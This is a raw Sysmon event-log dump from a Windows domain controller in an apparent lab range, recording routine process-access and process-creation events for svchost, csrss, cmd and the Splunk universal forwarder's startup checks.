09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4600-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD2-6151-4600-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.647{5EBD8912-8CD2-6151-4600-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CD2-6151-4400-00000000FD01}37963800C:\Windows\system32\cmd.exe{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.626{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5EBD8912-8CD2-6151-4400-00000000FD01}3796C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001053602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4400-00000000FD01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 